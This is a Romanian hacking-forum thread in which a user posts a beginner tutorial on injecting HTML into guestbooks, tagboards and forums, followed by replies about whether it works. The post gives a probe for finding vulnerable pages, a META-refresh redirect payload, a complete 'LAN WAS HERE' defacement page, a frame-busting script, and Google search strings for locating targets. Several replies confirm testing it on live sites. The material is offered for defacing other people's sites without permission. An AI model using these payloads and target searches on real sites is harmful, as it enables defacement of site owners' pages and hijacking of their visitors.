Filehost.ro - gazduire fisiere
Hacking and more...
HaCkinG CulT
Nou pe simpatie:
ionela24 pe Simpatie
Femeie
24 ani
Prahova
cauta Barbat
25 - 47 ani
Hacking and more...ReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
Hacking and more... / n00bs /

Html inject

Pagini: 1 Moderat de Shocker
#1
zbeng
Junior+
Postari: 43
+ Index                                                             
    +                                                                 
    +--- //.Introducere                                     
    +--- //.Unelte                                       
    +                                                                 
    +--- //.Procediment                                           
    +                                                                 
    +--- //.Note

   //.Introducere

       Este o tecnica care se bazeaza prin includerea sau injectarea codului   
       intrun forum tacoard,etc, numai daca esta habilitat optiunea html.

           //.Unelte
       Numa un simplu cod de proba...

       //.Procediment
Cautam un forum,tagboard,carte de vizita.Cel mai probabil
cu o carte de vizita, pentru ca sunt cele mai vulnerabile la "inject html".
Supunem ca esti intro carte de vizita dar cum stim daca
este vulnerabil?... Scriind un simplu cod html in
aria mesajului cum ar fi asta :<font color=red size=6>salut</font>   
Cu asta aflam: daca mesajul care l-am scris se pune de cuoare
rosie si apare cat de cat mare inseamna ca e vulnerabil
si stim ca acolo putem face ceva,urmatorul lucru care il vom face
deja cand stim ca e vulnerabil putem face multe lucruri
Cum ar fi:
   Sa includem codul urmator:

Code:

<META HTTP-EQUIV="refresh" CONTENT="1; url=www.web.com/hacked.htm">

-->Acest cod face sa redirectionam aceasta pagina la alta
Unde: [www.web.com/hacked.htm]
       este pagina unde va fi redirectionata sau url unde tu
       vei avea indexul tau cu "hacked by x" sau ce o fi...

Dar daca carte te vizita permite sa scriem mult "text" putem
include direct codul nostru de hacked...
Cum ar fi:

Code:

<html>                                                               
<head>                                                               
<STYLE type=text/css>                                               
BODY {                                                               
 SCROLLBAR-FACE-COLOR: #000000;                                      
 SCROLLBAR-HIGHLIGHT-COLOR: #000000;                                 
 SCROLLBAR-SHADOW-COLOR: #000000;                                    
 SCROLLBAR-3DLIGHT-COLOR: #000000;                                   
 SCROLLBAR-ARROW-COLOR: #ffffff;                                     
 SCROLLBAR-TRACK-COLOR: #ffffff;                                     
 FONT-FAMILY: Verdana;                                               
 SCROLLBAR-DARKSHADOW-COLOR: #000000                                
 </STYLE>                                                            
 <title>Lan was here  :.</title>                                     
 </head>                                                             
 <body alink="#ff0000" bgcolor="#000000" link="#ff0000"              
  text="#ff0000" vlink="#ff0000">                                    
 <div align="center">                                                
  <p><font color="#FFFFFF" SIZE=5><STRONG>LAN WAS HERE</STRONG>      
</font></p>                                                          
  <p><img src="img/hacked.jpg" border="0" height="270" width="500">  
</p></div>                                                           
<p align="center"> <font color="#fe5b2f" face="Haettenschweiler"       
size="4"><font color="#005E17" face="Haettenschweiler" size="+2">    
Me</font><font color="#FFFFFF" face="Haettenschweiler" size="+2">xi  
</font><font color="#FF0000" face="Haettenschweiler" size="+2">co    
</font></font></p>                                                   
<p align="center"><font color="#fe5b2f" face="Haettenschweiler"      
 size="4"><font color="#fe5b2f" face="Haettenschweiler" size="4">    
<font color="#fe5b2f" face="Haettenschweiler" size="4">              
<font color="#999999">Lan[at]gobiernofederal[dot]com<br>             
  <br>                                                               
  Www.[b]undeva[/b]/crew.net</font></font></font></font></p>                    
</body></html>

Putem pune si aceasta archiva la acest cod Javascript

Code:

<SCRIPT TYPE="text/javascript" LANGUAGE=JAVASCRIPT>                  
 <!--                                                                
 if (top.frames.length!=0)                                           
 top.location=self.document.location;                                
 // -->                                                              
 </SCRIPT>

Acel JavaScript face ca kacking-ul nostru sa se conectee prima data

     //.Notite
    Sunt infinite carti de vizita vulnerabile,cum ar fi cartile de vizita cgi,
ca sa le gasesti cauti in google ceva de gen    allinurl:"addguest.php"  
  Aceasta metoda este ceva simplu dar nu te opri aici.

TRADUCEREA SI ADAPTAREA: ZBENG
ASTEPT CORECTARI SAU ALTE DETALII


 
   
#2
cyber
Elite Member
Din: www.kellot.lx.ro
Postari: 528
mie nu imi merge...nu am reusit...

_______________________________________
..::Nu am mai trecut de mult pe aici::..

..::[][]::..

 
   
#3
Dynamyc
Elite Member
Din: de peste tot
Postari: 836
pai la site-uri nu merge (adica mie nu mi-a mers)

_______________________________________




 
   
#4
Crash Override
Helper
Din: HackPedia
Postari: 275

Dynamyc a scris:

pai la site-uri nu merge (adica mie nu mi-a mers)


@Dynamyc:  pai la site-uri nu merge .

atunci la ce merge ? poate niste reviste  p0rn0 !

La ce vrei sa mearga ma daca nu la siteuri  . a daca tu ai citit doar inurl:addguest.php
si codul de verificare e bine deaia nu ai inteles .
Ei bine eu tocmai l-am testat si a mers


_______________________________________
Hacking.3xForum.Ro - Helper

 
   
#5
krieg38
Grand Master
Postari: 229
Nu merge peste tot deoarece unele site-uri filtreaza ce adaugi in guestbook si scot automat tag-urile HTLM ca sa nu poti face diverse smecherii la ei in guestbook.

 
   
#6
Dynamyc
Elite Member
Din: de peste tot
Postari: 836
bv stress  sa cresti mare, imi merge si mie

_______________________________________




 
   
#7
Crash Override
Helper
Din: HackPedia
Postari: 275
Nai pentru ce .. , incercati si "allinurl:addentry.php" , trebuie sa ai rabdare..

_______________________________________
Hacking.3xForum.Ro - Helper

 
   

Topicuri similare

Pagini: 1  
Mergi la